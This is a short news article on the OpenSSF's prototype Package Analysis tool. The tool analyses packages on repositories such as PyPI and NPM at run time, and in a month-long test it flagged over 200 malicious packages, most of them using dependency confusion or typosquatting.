Malicious Packages in Open-Source Repositories

The Open Source Security Foundation (OpenSSF) has announced the initial prototype release of a new tool that's capable of carrying out dynamic analysis of all packages uploaded to popular open source repositories.

Called the Package Analysis project, the initiative aims to secure open-source packages by detecting and alerting users to any malicious behavior with the goal of bolstering the security of the software supply chain and increasing trust in open-source software.


"The Package Analysis project seeks to understand the behavior and capabilities of packages available on open source repositories: what files do they access, what addresses do they connect to, and what commands do they run?," the OpenSSF said.

"The project also tracks changes in how packages behave over time, to identify when previously safe software begins acting suspiciously," the foundation's Caleb Brown and David A. Wheeler added.

In a test run that lasted a month, the tool identified more than 200 malicious packages uploaded to PyPI and NPM, with a majority of the rogue libraries leveraging dependency confusion and typosquatting attacks.

Google, which is a member of OpenSSF, has also rallied its support behind the Package Analysis project, while emphasizing the need for "vetting packages being published in order to keep users safe."

🔐 Mastering API Security: Understanding Your True Attack Surface

Discover the untapped vulnerabilities in your API ecosystem and take proactive steps towards ironclad security. Join our insightful webinar!

Join the Session

The tech giant's Open Source Security Team, last year, put forth a new framework called Supply chain Levels for Software Artifacts (SLSA) to ensure the integrity of software packages and prevent unauthorized modifications.

The development comes as the open source ecosystem is being increasingly weaponized to target developers with a variety of malware, including cryptocurrency miners and information stealers.

Found this article interesting? Follow us on Twitter and LinkedIn to read more exclusive content we post.